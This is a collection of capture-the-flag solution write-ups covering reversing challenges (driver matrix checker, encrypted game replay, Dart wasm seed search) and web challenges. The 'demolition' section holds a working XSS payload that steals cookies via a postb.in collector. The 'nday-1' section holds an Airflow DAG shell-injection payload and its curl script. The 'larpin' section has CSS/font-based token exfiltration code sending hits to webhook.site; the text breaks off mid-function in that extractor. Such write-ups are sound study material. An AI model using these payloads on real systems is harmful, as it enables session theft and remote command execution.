
def build_q_table(n: int = 8) -> bytes:
    table = bytearray(n * n)
    for row in range(n):
        for col in range(n):
            idx = row * n + col
            if col == row:
                table[idx] = 1
            elif col > row:
                table[idx] = 0
            else:
                base = (17 * col) + (31 * row)
                adjust = (base + 13) // 250
                table[idx] = (base - (250 * adjust) + 0x0E) & 0xFF
    return bytes(table)


Q_TABLE = build_q_table()


def q_inv(data: bytes) -> bytes:
    out = bytearray(data)
    if len(out) >= 64:
        for row in range(8):
            for col in range(row + 1, 8):
                i = row * 8 + col
                j = col * 8 + row
                out[i], out[j] = out[j], out[i]
    for start in range(0, len(out), 64):
        block = out[start : start + 64]
        for i in range(len(block)):
            block[i] ^= Q_TABLE[i]
        out[start : start + len(block)] = block
    return bytes(out)


def p_inv(data: bytes) -> bytes:
    length = len(data)
    src = bytearray(length)
    for i in range(length):
        target = (3 - i) % length
        value = data[target]
        rot = (i % 7) + 1
        value = ror8(value, rot)
        value ^= (9 * i + 0x42) & 0xFF
        src[i] = value
    return bytes(src)


def pre_affine_inv(data: bytes) -> bytes:
    out = bytearray(data)
    for i in range(len(out) - 1):
        out[i] = (out[i] - out[i + 1] - ((5 * i + 0x1F) & 0xFF)) & 0xFF
    for i in range(len(out) - 1, 0, -1):
        out[i] ^= ((3 * i) + out[i - 1]) & 0xFF
    return bytes(out)


def rotate_right(data: bytes, count: int) -> bytes:
    if not data:
        return data
    count %= len(data)
    if count == 0:
        return data
    return data[-count:] + data[:-count]


def stage6_inv(data: bytes) -> bytes:
    out = bytearray(data)
    seed = 0x5D
    for i, byte in enumerate(out):
        out[i] = (byte - (seed & 0xFF) - ((0x1D * i + 0x71) & 0xFF)) & 0xFF
        seed = byte ^ ((0x0D * i + 0xA7) & 0xFF)
    return bytes(out)


def stage5_inv(data: bytes) -> bytes:
    out = bytearray(data)
    for i in range(0, len(out) - 1, 2):
        t1 = out[i + 1]
        a = out[i] ^ ((0x11 * i + 0x23) & 0xFF) ^ (((t1 << 5) | (t1 >> 3)) & 0xFF)
        b = t1 ^ (((a << 3) | (a >> 5)) & 0xFF) ^ ((0x0B * i + 0x6D) & 0xFF)
        out[i] = a & 0xFF
        out[i + 1] = b & 0xFF
    return bytes(out)


def stage4_inv(data: bytes) -> bytes:
    if len(data) < 64:
        return data
    out = bytearray(data)
    mixed = out[:64]
    transposed = bytearray(64)
    for row in range(8):
        for col in range(8):
            idx = row * 8 + col
            src_col = (col + row) % 8
            transposed[row * 8 + src_col] = (mixed[idx] - idx) & 0xFF
    original = bytearray(64)
    for row in range(8):
        for col in range(8):
            original[col * 8 + row] = transposed[row * 8 + col]
    out[:64] = original
    return bytes(out)


def stage3_inv(data: bytes) -> bytes:
    return bytes((byte * 0xB9) & 0xFF for byte in data)


def stage1_inv(data: bytes) -> bytes:
    if not data:
        return data
    count = sum(data) % len(data)
    return rotate_right(data, count)


def stage0_inv(data: bytes) -> bytes:
    return bytes((((byte - 0x3C) & 0xFF) ^ 0xA5) & 0xFF for byte in data)


def unshuffle_inv(data: bytes) -> bytes:
    buf = bytearray(data)
    swaps: list[tuple[int, int]] = []
    seed = 0x1337
    for i in range(len(buf) - 1, 0, -1):
        seed = (seed * 0x19660D + 0x3C6EF35F) & 0xFFFFFFFF
        j = seed % (i + 1)
        swaps.append((i, j))
    for i, j in reversed(swaps):
        buf[i], buf[j] = buf[j], buf[i]
    for i in range(len(buf)):
        buf[i] = (buf[i] - i) & 0xFF
        buf[i] ^= 0xC0
    return bytes(buf)


def decrypt_body(ciphertext: bytes) -> bytes:
    cipher = AES.new(KEY_ASCII, AES.MODE_CBC, IV_ASCII)
    padded = cipher.decrypt(ciphertext)
    pad = padded[-1]
    if pad == 0 or pad > 16 or padded[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad PKCS#7 padding")
    inner = padded[:-pad]
    if not inner.endswith(TRAILER):
        raise ValueError("missing trailer")
    return inner[: -len(TRAILER)]


def invert_transform(data: bytes) -> bytes:
    data = affine_inv(data)
    data = pre_affine_inv(data)
    data = lfsr_inv(data)
    data = q_inv(data)
    data = p_inv(data)
    data = unshuffle_inv(data)
    data = stage6_inv(data)
    data = stage5_inv(data)
    data = stage4_inv(data)
    data = stage3_inv(data)
    data = lfsr_xor(data, 0xBEEF)
    data = stage1_inv(data)
    data = stage0_inv(data)
    return data


def main() -> None:
    ciphertext = FLAG_ENC.read_bytes()
    transformed = decrypt_body(ciphertext)
    plain = invert_transform(transformed)
    print(plain.decode())


if __name__ == "__main__":
    main()

substrate

Description

The userland binary SubstrateUM.exe talks to the driver SubstrateKM.sys with two IOCTLs. It reads 0x45 bytes from stdin, sends them one byte at a time with IOCTL 0x228124, then sends IOCTL 0x228128 to ask the driver whether the whole input is correct.

Static reversing of the first IOCTL handler shows it is only a setter:

input buffer is 2 bytes: [index, value]
value is stored in a global 72-byte buffer at buf[index]
the userland program only sends 69 bytes, so the last 3 bytes in the driver buffer stay 0

The real work is in the second IOCTL. The code is flattened and annoying to single-step, so the clean path is:

Reverse the userland IOCTL usage.
Reverse the setter in the driver.
Recover the checker logic from the driver.
Solve the recovered equations modulo 256.

The checker operates on 8 chunks of 9 bytes. Each chunk is a 3x3 upper-triangular matrix built from a 9-byte entry block in the driver. The matching target bytes come from another 9-byte block in .data.

For one chunk with entry bytes e[0..8], the matrix is:

M = [
  [e[0] | 1, e[1],     e[2]],
  [0,        e[4] | 1, e[5]],
  [0,        0,        e[8] | 1],
]

If a plaintext row is [a, b, c], the checker compares:

[a, b, c] * M == [y0, y1, y2]   (mod 256)

Because M is upper-triangular and every diagonal byte is odd (| 1), each row can be solved directly with modular inverses in Z/256Z.

Solution

The following script extracts the two 72-byte tables from SubstrateKM.sys, reconstructs the matrices, solves every row, and prints the accepted flag.

from pathlib import Path

MOD = 256
ENTRY_OFF = 0x8E60
CONST_OFF = 0xA800
N = 72


def inv_odd(x: int) -> int:
    # All diagonal entries are odd, so they are invertible mod 256.
    return pow(x, -1, MOD)


def solve_row(m00: int, m01: int, m02: int, m11: int, m12: int, m22: int, y0: int, y1: int, y2: int):
    a = (y0 * inv_odd(m00)) % MOD
    b = ((y1 - a * m01) * inv_odd(m11)) % MOD
    c = ((y2 - a * m02 - b * m12) * inv_odd(m22)) % MOD
    return bytes([a, b, c])


blob = Path("attachments/SubstrateKM.sys").read_bytes()
entry = blob[ENTRY_OFF:ENTRY_OFF + N]
target = blob[CONST_OFF:CONST_OFF + N]

flag = bytearray()

for chunk in range(8):
    e = entry[chunk * 9:(chunk + 1) * 9]
    t = target[chunk * 9:(chunk + 1) * 9]

    m00 = e[0] | 1
    m01 = e[1]
    m02 = e[2]
    m11 = e[4] | 1
    m12 = e[5]
    m22 = e[8] | 1

    for row in range(3):
        y0, y1, y2 = t[row * 3:(row + 1) * 3]
        flag += solve_row(m00, m01, m02, m11, m12, m22, y0, y1, y2)

# Only 69 bytes are sent from userland; the final 3 driver bytes remain zero.
flag = bytes(flag[:-3])
print(flag.decode())

Running it prints:

CTF{1c41e1d89f95c6c6b45f256f06e554f904257c884f683528302bacbde8b9484f}

the flag is a lie

Description

The shipped game contains a fake visible flag and a hidden dev scene. The real signal is the bundled encrypted replay log session-20260225-111621.unrl.

LogRecorder in the hidden dev scene stores the AES key in serialized scene data, and the .unrl file is a stream of encrypted replay records. After decrypting and parsing the records, the useful view is not the late static grid; the solve comes from the early moving entities (id <= 180). In a rotated orthographic projection near the end of the replay, those entities form mirrored text. Flipping the image horizontally reads:

CERTIFIED_CRATE_PUSHER

So the flag is:

UNR{CERTIFIED_CRATE_PUSHER}

Solution

The important recovered AES key from the hidden dev scene is:

26 c1 c1 56 a2 2d 31 74 e5 eb f7 c1 c8 b9 4b 6e

The .unrl container is:

magic UNRL
version 2
encrypted-record flag byte
then alternating length-prefixed blobs:
- 16-byte IV
- ciphertext blob

Each decrypted record is:

type byte
entity id int32
timestamp double
optional transform payload for 41-byte records:
- Vector3 position
- Quaternion rotation

I used the following script to decrypt and parse the bundled replay:

#!/usr/bin/env python3
import struct
from pathlib import Path

import numpy as np
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad


KEY = bytes.fromhex("26 c1 c1 56 a2 2d 31 74 e5 eb f7 c1 c8 b9 4b 6e")


def read_blob(buf: bytes, off: int):
    n = struct.unpack_from("<I", buf, off)[0]
    off += 4
    blob = buf[off : off + n]
    off += n
    return blob, off


def main():
    path = Path("work/linux/TheFlagIsALie_Data/Logs/session-20260225-111621.unrl")
    if not path.exists():
        path = Path("work/linux/TheFlagIsALie_Data/Logs").glob("*.unrl").__next__()

    data = path.read_bytes()
    assert data[:4] == b"UNRL"
    version = struct.unpack_from("<I", data, 4)[0]
    encrypted = data[8]
    assert version == 2
    assert encrypted == 1

    off = 9
    rows = []
    while off < len(data):
        iv, off = read_blob(data, off)
        ct, off = read_blob(data, off)
        pt = unpad(AES.new(KEY, AES.MODE_CBC, iv).decrypt(ct), 16)

        ty = pt[0]
        eid = struct.unpack_from("<i", pt, 1)[0]
        ts = struct.unpack_from("<d", pt, 5)[0]

        row = {
            "typ": ty,
            "id": eid,
            "t": ts,
            "x": 0.0,
            "y": 0.0,
            "z": 0.0,
            "qx": 0.0,
            "qy": 0.0,
            "qz": 0.0,
            "qw": 0.0,
        }
        if len(pt) == 41:
            row["x"], row["y"], row["z"] = struct.unpack_from("<fff", pt, 13)
            row["qx"], row["qy"], row["qz"], row["qw"] = struct.unpack_from("<ffff", pt, 25)
        rows.append(row)

    arrs = {}
    for key in rows[0]:
        dt = np.uint8 if key == "typ" else np.int32 if key == "id" else np.float64 if key == "t" else np.float32
        arrs[key] = np.array([row[key] for row in rows], dtype=dt)
    np.savez("unrl_records_full.npz", **arrs)
    print("saved unrl_records_full.npz")


if __name__ == "__main__":
    main()

Then I used a small interactive viewer over the parsed replay. The key point is to look at only the early entities (id <= 180) and rotate the projection. Near the end of the replay, they collapse into a mirrored line of text.

#!/usr/bin/env python3
from bisect import bisect_right

import matplotlib.pyplot as plt
import numpy as np
from matplotlib.animation import FuncAnimation
from matplotlib.widgets import Slider


CREATE = 1
DELETE = 2
UPDATE = 3


def load_tracks():
    arr = np.load("unrl_records_full.npz")
    typ = arr["typ"]
    ids = arr["id"]
    t = arr["t"]
    x = arr["x"]
    y = arr["y"]
    z = arr["z"]

    order = np.argsort(t, kind="mergesort")
    tracks = {}
    for i in order:
        eid = int(ids[i])
        if eid > 180 or typ[i] == DELETE:
            continue
        tracks.setdefault(eid, []).append((float(t[i]), float(x[i]), float(y[i]), float(z[i])))

    out = {}
    for eid, pts in tracks.items():
        out[eid] = np.array(pts, dtype=float)
    return out, float(t.max())


def interp(track: np.ndarray, target_t: float):
    ts = track[:, 0]
    j = bisect_right(ts, target_t) - 1
    if j < 0:
        return None
    if j + 1 < len(track):
        t0 = ts[j]
        t1 = ts[j + 1]
        if t1 > t0:
            a = (target_t - t0) / (t1 - t0)
            return track[j, 1:] * (1.0 - a) + track[j + 1, 1:] * a
    return track[j, 1:]


def project(points: np.ndarray, yaw_deg: float, pitch_deg: float, center: np.ndarray):
    if len(points) == 0:
        return np.empty((0, 2), dtype=float)
    pts = points - center[None, :]
    yaw = np.deg2rad(yaw_deg)
    pitch = np.deg2rad(pitch_deg)
    cy, sy = np.cos(yaw), np.sin(yaw)
    cp, sp = np.cos(pitch), np.sin(pitch)

    x1 = cy * pts[:, 0] + sy * pts[:, 2]
    z1 = -sy * pts[:, 0] + cy * pts[:, 2]
    y1 = pts[:, 1]
    y2 = cp * y1 - sp * z1
    return np.stack([x1, y2], axis=1)


def main():
    tracks, t_max = load_tracks()
    all_pts = np.concatenate([track[:, 1:] for track in tracks.values()], axis=0)
    center = all_pts.mean(axis=0)

    fig, ax = plt.subplots(figsize=(10, 8))
    plt.subplots_adjust(bottom=0.15)
    ax.set_aspect("equal", adjustable="box")
    sc = ax.scatter([], [], s=10, c="blue")

    slider_ax = fig.add_axes((0.12, 0.05, 0.76, 0.03))
    slider = Slider(slider_ax, "t", 0.0, t_max, valinit=t_max, valstep=0.01)

    state = {
        "t": t_max,
        "yaw": 0.0,
        "pitch": 0.0,
        "playing": False,
        "sync": False,
    }

    def redraw():
        pts = []
        for track in tracks.values():
            p = interp(track, state["t"])
            if p is not None:
                pts.append(p)
        pts = np.array(pts, dtype=float) if pts else np.empty((0, 3), dtype=float)
        uv = project(pts, state["yaw"], state["pitch"], center)
        sc.set_offsets(uv)
        if len(uv):
            xmin, ymin = uv.min(axis=0)
            xmax, ymax = uv.max(axis=0)
            padx = max(1.0, (xmax - xmin) * 0.06)
            pady = max(1.0, (ymax - ymin) * 0.06)
            ax.set_xlim(xmin - padx, xmax + padx)
            ax.set_ylim(ymin - pady, ymax + pady)
        ax.set_title(f"t={state['t']:.2f} yaw={state['yaw']:.0f} pitch={state['pitch']:.0f}")
        fig.canvas.draw_idle()

    def on_slider(val):
        if state["sync"]:
            return
        state["t"] = float(val)
        redraw()

    def sync_slider():
        state["sync"] = True
        slider.set_val(state["t"])
        state["sync"] = False

    def on_key(event):
        key = event.key
        if key == " ":
            state["playing"] = not state["playing"]
        elif key == "left":
            state["t"] = max(0.0, state["t"] - 0.1)
            sync_slider()
            redraw()
        elif key == "right":
            state["t"] = min(t_max, state["t"] + 0.1)
            sync_slider()
            redraw()
        elif key == "shift+left":
            state["t"] = max(0.0, state["t"] - 1.0)
            sync_slider()
            redraw()
        elif key == "shift+right":
            state["t"] = min(t_max, state["t"] + 1.0)
            sync_slider()
            redraw()
        elif key == "q":
            state["yaw"] -= 5.0
            redraw()
        elif key == "e":
            state["yaw"] += 5.0
            redraw()
        elif key == "a":
            state["pitch"] -= 5.0
            redraw()
        elif key == "d":
            state["pitch"] += 5.0
            redraw()
        elif key == "c":
            state["yaw"] = 0.0
            state["pitch"] = 0.0
            redraw()

    def tick(_frame):
        if not state["playing"]:
            return
        state["t"] += 0.05
        if state["t"] > t_max:
            state["t"] = 0.0
        sync_slider()
        redraw()

    slider.on_changed(on_slider)
    fig.canvas.mpl_connect("key_press_event", on_key)
    FuncAnimation(fig, tick, interval=30, cache_frame_data=False)
    redraw()
    plt.show()


if __name__ == "__main__":
    main()

At the end of playback, rotating the early-entity projection reveals mirrored text. Flip that image horizontally and it reads:

CERTIFIED_CRATE_PUSHER

Final flag:

UNR{CERTIFIED_CRATE_PUSHER}

webd-art

Description

The challenge ships a browser app backed by a Dart-to-Wasm module. The visible UI only accepts a phrase and renders art on a canvas. The interesting logic lives inside main.wasm.

Solution

main.mjs is just the standard Dart wasm loader. The real work is in main.wasm.

Using binaryen to print the module to text showed:

The app checks the input against ^CTF\\{[ -~]{8,80}\\}$.
On success it can draw:
- CERTIFICATE UNLOCKED
- a second string
- stamp: verified locally
That unlock path is gated by a br_if in function $115.

I patched a copy of the wasm to bypass that single branch so the hidden middle string would be rendered for any CTF{...} input. That confirmed the middle string is not a constant; it is generated from a 32-bit seed and then UTF-8 decoded.

The patch was:

from pathlib import Path

b = bytearray(Path("handover/main.wasm").read_bytes())
assert b[37591] == 0x0D and b[37592] == 0x00  # br_if 0
b[37591] = 0x1A  # drop
b[37592] = 0x01  # nop
Path("patched_unlock.wasm").write_bytes(b)

The relevant part of the unlock path is:

Build a 32-bit seed from the input-dependent hash state.
Generate 40 bytes with an xxhash32-style avalanche.
XOR those bytes with a static 40-byte table embedded in the wasm.
Decode the result as UTF-8 and draw it on the canvas.

Because the final hidden string is itself a flag, its prefix is known: CTF{.

The avalanche step is a permutation on 32-bit values, so the first known output byte reduces the search from 2^32 seeds to 2^24 candidates. I inverted the avalanche, enumerated all candidates matching the first byte, and filtered them with the remaining known prefix/suffix plus printable-ASCII constraints. That yields a unique result.

Code used:

#include <stdint.h>
#include <stdio.h>

static const uint8_t static_bytes[40] = {
    218, 78, 141, 70, 79, 33, 46, 234, 174, 75,
    4, 130, 143, 169, 189, 93, 127, 4, 198, 150,
    239, 47, 94, 136, 89, 231, 203, 209, 88, 150,
    122, 147, 60, 167, 251, 224, 198, 100, 50, 163
};

static inline uint32_t avalanche(uint32_t x) {
    x = (x ^ (x >> 16)) * 2246822507u;
    x = (x ^ (x >> 13)) * 3266489909u;
    x = x ^ (x >> 16);
    return x;
}

static inline uint32_t unxorshr16(uint32_t x) {
    return x ^ (x >> 16);
}

static inline uint32_t unxorshr13(uint32_t x) {
    x ^= x >> 13;
    x ^= x >> 26;
    return x;
}

static inline uint32_t inv_avalanche(uint32_t x) {
    x = unxorshr16(x);
    x *= 2127672349u;
    x = unxorshr13(x);
    x *= 2781581891u;
    x = unxorshr16(x);
    return x;
}

static inline uint8_t byte_for_seed(uint32_t seed, int idx) {
    uint32_t x = seed + 2654435769u * (uint32_t)(idx + 1);
    return (uint8_t)(avalanche(x) & 0xffu) ^ static_bytes[idx];
}

int main(void) {
    const char *prefix = "CTF{";
    uint32_t target0 = (uint32_t)(static_bytes[0] ^ (uint8_t)prefix[0]);

    for (uint32_t hi = 0; hi < (1u << 24); hi++) {
        uint32_t x0 = inv_avalanche((hi << 8) | target0);
        uint32_t seed = x0 - 2654435769u;

        if (byte_for_seed(seed, 1) != (uint8_t)prefix[1]) continue;
        if (byte_for_seed(seed, 2) != (uint8_t)prefix[2]) continue;
        if (byte_for_seed(seed, 3) != (uint8_t)prefix[3]) continue;
        if (byte_for_seed(seed, 39) != (uint8_t)'}') continue;

        char out[41];
        int ok = 1;
        for (int i = 0; i < 40; i++) {
            uint8_t b = byte_for_seed(seed, i);
            if (b < 0x20 || b > 0x7e) {
                ok = 0;
                break;
            }
            out[i] = (char)b;
        }
        out[40] = '\0';

        if (!ok) continue;
        printf("seed=0x%08x %u\n%s\n", seed, seed, out);
    }

    return 0;
}

Build and run:

gcc -O3 -std=c11 -o seed_search seed_search.c
./seed_search

Output:

seed=0x13564e1d 324423197
CTF{7h3_w3b_15_4_l13_rng_15_d373rm1n15m}

web

demolition

Description

Web challenge with a public app at https://demolition.breakable.live/ and an admin bot at https://demolition-bot.breakable.live/.

The app auto-runs a render pipeline on page load using query parameters:

p: profile blob
d: draft HTML
tpl: compose template

The bot sets a non-HttpOnly FLAG cookie for the challenge origin, then visits a submitted challenge URL.

Solution

The intended bug chain is:

The frontend lets p=render.engine=go switch /api/render from the Python escape path to the Go sanitizer path.
Flask blocks script tags with:

SCRIPT_FENCE_RE = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE | re.ASCII)

This is ASCII-only.

The Go sanitizer canonicalizes allowed tags with Unicode-aware strings.EqualFold, so <ſcript> using ſ (U+017F, long s) is accepted as script and rewritten to a real <script> tag:

func canonicalTag(name string, allow []string) string {
	for _, candidate := range allow {
		if strings.EqualFold(name, candidate) {
			return candidate
		}
	}
	return ""
}

The frontend inserts the returned HTML with innerHTML, then explicitly re-arms script tags:

els.rendered.innerHTML = data.html || "";
armScripts(els.rendered);

So a payload in d becomes executable JavaScript in the bot’s browser.

Since the bot’s FLAG cookie is not HttpOnly, the XSS can read document.cookie and exfiltrate it.

I used postb.in as a temporary request collector.

First create a bin:

curl -sS -L -X POST https://postb.in/api/bin

It returned:

{"binId":"1772789752662-2894196030683","now":1772789752662,"expires":1772791552662}

Then build the exploit URL:

import urllib.parse

binid = "1772789752662-2894196030683"
payload = (
    "<ſcript>"
    f"location='https://www.postb.in/{binid}?c='+encodeURIComponent(document.cookie)"
    "</ſcript>"
)

params = {
    "p": "render.engine=go",
    "d": payload,
}

print("https://demolition.breakable.live/?" + urllib.parse.urlencode(params))

That produced:

https://demolition.breakable.live/?p=render.engine%3Dgo&d=%3C%C5%BFcript%3Elocation%3D%27https%3A%2F%2Fwww.postb.in%2F1772789752662-2894196030683%3Fc%3D%27%2BencodeURIComponent%28document.cookie%29%3C%2F%C5%BFcript%3E

Submit it to the bot:

curl -sS -X POST https://demolition-bot.breakable.live/api/submit \
  -H 'Content-Type: application/json' \
  --data '{"url":"https://demolition.breakable.live/?p=render.engine%3Dgo&d=%3C%C5%BFcript%3Elocation%3D%27https%3A%2F%2Fwww.postb.in%2F1772789752662-2894196030683%3Fc%3D%27%2BencodeURIComponent%28document.cookie%29%3C%2F%C5%BFcript%3E"}'

After the bot visited the page, read the captured request:

curl -sS https://www.postb.in/api/bin/1772789752662-2894196030683/req/shift

Relevant part of the response:

{
  "query": {
    "c": "FLAG=CTF{7b5d3e42e57dab38821b5215138825098cbe965c67c131b6c64be1805626481d}"
  }
}

Flag:

CTF{7b5d3e42e57dab38821b5215138825098cbe965c67c131b6c64be1805626481d}

nday-1

Description

The challenge deploys Apache Airflow and gives default credentials admin/admin.

The instance was running Airflow 3.0.4 and exposed the bundled example DAGs. One of them, example_dag_decorator, is vulnerable because it accepts a trigger-time url, fetches JSON from that URL, copies raw_json["origin"] into a shell command, and passes it directly to BashOperator.

Solution

Relevant DAG source:

class GetRequestOperator(BaseOperator):
    template_fields = ("url",)

    def __init__(self, *, url: str, **kwargs):
        super().__init__(**kwargs)
        self.url = url

    def execute(self, context: Context):
        return httpx.get(self.url).json()

@dag(schedule=None, start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), catchup=False)
def example_dag_decorator(url: str = "http://httpbin.org/get"):
    get_ip = GetRequestOperator(task_id="get_ip", url=url)

    @task(multiple_outputs=True)
    def prepare_command(raw_json: dict[str, Any]) -> dict[str, str]:
        external_ip = raw_json["origin"]
        return {
            "command": f"echo 'Seems like today your server executing Airflow is connected from IP {external_ip}'",
        }

    command_info = prepare_command(get_ip.output)
    BashOperator(task_id="echo_ip_info", bash_command=command_info["command"])

httpbin has /response-headers, which returns arbitrary query parameters as JSON. So trigger the DAG with:

url = https://httpbin.org/response-headers?origin=X%27%3B%20cat%20/flag.txt%3B%20%23

That makes the final rendered command:

echo 'Seems like today your server executing Airflow is connected from IP X'; cat /flag.txt; #'

I used the API directly:

BASE='http://34.159.87.224:32295'

TOKEN=$(curl -sS -X POST "$BASE/auth/token" \
  -H 'Content-Type: application/json' \
  --data '{"username":"admin","password":"admin"}' | jq -r '.access_token')

RID="manual__decor_flag_$(date -u +%Y%m%dT%H%M%SZ)"
PAYLOAD="X'; cat /flag.txt; #"
ENC=$(printf '%s' "$PAYLOAD" | jq -sRr @uri)
URL="https://httpbin.org/response-headers?origin=$ENC"

curl -sS -X POST "$BASE/api/v2/dags/example_dag_decorator/dagRuns" \
  -H "Authorization: Bearer $TOKEN" \
  -H 'Content-Type: application/json' \
  --data "{\"dag_run_id\":\"$RID\",\"logical_date\":\"$(date -u +%Y-%m-%dT%H:%M:%SZ)\",\"conf\":{\"url\":\"$URL\"}}"

sleep 10

TRY=$(curl -sS "$BASE/api/v2/dags/example_dag_decorator/dagRuns/$RID/taskInstances/echo_ip_info" \
  -H "Authorization: Bearer $TOKEN" | jq -r '.try_number')

curl -sS "$BASE/api/v2/dags/example_dag_decorator/dagRuns/$RID/taskInstances/echo_ip_info/logs/$TRY" \
  -H "Authorization: Bearer $TOKEN" | jq -r '.content[] | select(.event) | .event'

The task log printed:

CTF{2539590147b12b33dfd9d0bc65c86aec525af4d4dd9c997258d57b09c9adf16d}

larpin

Description

Larp guru says: wake up in miami beach all I see is sand, take a look out my kitchen window all I see is land. Get larpin premium to larp harder.

Solution

The report bot renders reported profiles in HeadlessChrome 145 through a local wrapper origin. Reported profile content is sanitized with DOMPurify, but an SVG <style> survives and applies globally. The rendered profile page also contains an inline config script:

window.__USER_CONFIG__ = {
  ...,
  isPremium: true/false,
  premiumToken: "...",
  profileViewed: "..."
}

The trick was to exfiltrate premiumToken from that inline script with CSS only.

Target the inline config script with:

script:not([src]):has(+script[src*='purify'])

Force that script to render as text and give it an anchor.
Use a custom font where every glyph is zero-width except the single character that appears immediately after the known context premiumToken: "<known_prefix>.
Map candidate characters to different glyph widths.
Use an absolutely positioned probe with width: anchor-size(--cfg inline) and a container query to translate the resulting width into a webhook hit.
Repeat one character at a time until the terminating " is observed.

That recovered the premium token:

3cc9ae83308398ea3c34277f21a7c1e165efea1c79e45738df2efbcd3937ea18

Then I activated premium and opened /premium, which displayed the final flag directly:

CTF{9c74ad30966176e402b810109840f7ea62c2f34267ff5d4d1fc2bcaa8e7159b2}

Commands used:

python3 extract_premium_token.py --base-url http://34.179.219.124:32024 --known-prefix 3
curl -b live.cookie -c live.cookie \
  -d 'token=3cc9ae83308398ea3c34277f21a7c1e165efea1c79e45738df2efbcd3937ea18' \
  http://34.179.219.124:32024/premium/activate
curl -b live.cookie http://34.179.219.124:32024/premium

Helper font builder used during the solve:

#!/usr/bin/env python3
import argparse
from copy import deepcopy
from pathlib import Path

from fontTools.feaLib.builder import addOpenTypeFeaturesFromString
from fontTools.ttLib import TTFont


def parse_args():
    p = argparse.ArgumentParser(
        description="Build a font that only renders one context-matched character with a width-encoded glyph."
    )
    p.add_argument("--base", default="widthctx.ttf", help="Base TTF to clone from")
    p.add_argument("--output", required=True, help="Output TTF path")
    p.add_argument(
        "--context",
        required=True,
        help="Exact preceding text that must appear before the target character",
    )
    p.add_argument(
        "--alphabet",
        required=True,
        help='Candidate characters to encode, e.g. abcdefghijklmnopqrstuvwxyz_"',
    )
    p.add_argument(
        "--width-step",
        type=int,
        default=256,
        help="Advance-width step in font units between encoded characters",
    )
    return p.parse_args()


def char_to_glyph(font, ch):
    cmap = font.getBestCmap()
    code = ord(ch)
    if code not in cmap:
        raise ValueError(f"Missing glyph for {ch!r} (U+{code:04X}) in base font")
    return cmap[code]


def fea_escape_glyph(glyph_name):
    return glyph_name


def build_feature(font, context, alphabet, vis_names):
    ctx_glyphs = [fea_escape_glyph(char_to_glyph(font, ch)) for ch in context]
    rules = ["languagesystem DFLT dflt;", "", "feature calt {"]
    ctx = " ".join(ctx_glyphs)
    for ch in alphabet:
        glyph = fea_escape_glyph(char_to_glyph(font, ch))
        vis = fea_escape_glyph(vis_names[ch])
        if ctx:
            rules.append(f"  sub {ctx} {glyph}' by {vis};")
        else:
            rules.append(f"  sub {glyph}' by {vis};")
    rules.append("} calt;")
    return "\n".join(rules)


def main():
    args = parse_args()
    font = TTFont(args.base)

    if "GSUB" in font:
        del font["GSUB"]

    glyph_order = list(font.getGlyphOrder())
    hmtx = font["hmtx"].metrics
    glyf = font["glyf"]

    for glyph_name in glyph_order:
        width, lsb = hmtx[glyph_name]
        hmtx[glyph_name] = (0, lsb)

    vis_names = {}
    for idx, ch in enumerate(args.alphabet):
        orig = char_to_glyph(font, ch)
        vis = f"{orig}.ctxvis{idx}"
        if vis in hmtx:
            raise ValueError(f"Duplicate generated glyph name {vis}")
        glyf[vis] = deepcopy(glyf[orig])
        width, lsb = font["hmtx"].metrics[orig]
        hmtx[vis] = ((idx + 1) * args.width_step, lsb)
        glyph_order.append(vis)
        vis_names[ch] = vis

    font.setGlyphOrder(glyph_order)
    font["maxp"].numGlyphs = len(glyph_order)

    feature_text = build_feature(font, args.context, args.alphabet, vis_names)
    addOpenTypeFeaturesFromString(font, feature_text)

    out = Path(args.output)
    font.save(out)
    print(out)


if __name__ == "__main__":
    main()

Extractor used during the solve:

#!/usr/bin/env python3
import argparse
import base64
import json
import subprocess
import sys
import time
import urllib.parse
import urllib.request
from http.cookiejar import CookieJar
from pathlib import Path
from urllib.error import HTTPError

from fontTools.ttLib import TTFont


DEFAULT_ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789_-"'
CONTEXT_PREFIX = 'premiumToken: "'
FONT_SUBSET_TEXT = "".join(chr(i) for i in range(32, 127))


class Session:
    def __init__(self, base_url: str):
        self.base_url = base_url.rstrip("/")
        self.cj = CookieJar()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(self.cj))

    def request(self, method: str, path: str, data=None, headers=None):
        url = path if path.startswith("http://") or path.startswith("https://") else self.base_url + path
        req = urllib.request.Request(url, data=data, headers=headers or {}, method=method)
        return self.opener.open(req, timeout=30)

    def post_form(self, path: str, fields: dict[str, str]):
        body = urllib.parse.urlencode(fields).encode()
        return self.request(
            "POST",
            path,
            body,
            {"Content-Type": "application/x-www-form-urlencoded"},
        )


def sh(cmd: list[str], **kwargs):
    subprocess.run(cmd, check=True, **kwargs)


def create_webhook_token() -> str:
    req = urllib.request.Request(
        "https://webhook.site/token",
        data=b"",
        headers={"Accept": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)["uuid"]


def fetch_webhook_requests(token: str) -> list[dict]:
    req = urllib.request.Request(
        f"https://webhook.site/token/{token}/requests?sorting=newest",
        headers={"Accept": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        data = json.load(resp)
    return data.get("data", [])


def build_subset_base(base_font: Path, subset_font: Path, alphabet: str):
    text = "".join(sorted(set(FONT_SUBSET_TEXT + CONTEXT_PREFIX + alphabet)))
    sh(
        [
            "pyftsubset",
            str(base_font),
            f"--text={text}",
            f"--output-file={subset_font}",
            "--layout-features=",
            "--drop-tables+=GSUB,GPOS,GDEF",
            "--name-IDs=*",
            "--glyph-names",
            "--symbol-cmap",
            "--legacy-cmap",
            "--notdef-glyph",
            "--notdef-outline",
            "--recommended-glyphs",
        ],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )


def build_woff2_font(make_font: Path, subset_font: Path, out_ttf: Path, out_woff2: Path, context: str, alphabet: str):
    sh(
        [
            sys.executable,
            str(make_font),
            "--base",
            str(subset_font),
            "--output",
            str(out_ttf),
            "--context",
            context,
            "--alphabet",
            alphabet,
            "--width-step",
            "1536",
        ],
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
    )
    font = TTFont(out_ttf)
    font.flavor = "woff2"
    font.save(out_woff2)
    return base64.b64encode(out_woff2.read_bytes()).decode()


def css_rules_for_alphabet(token: str, alphabet: str, bucket_px: int):
    rules = []
    half = bucket_px // 2
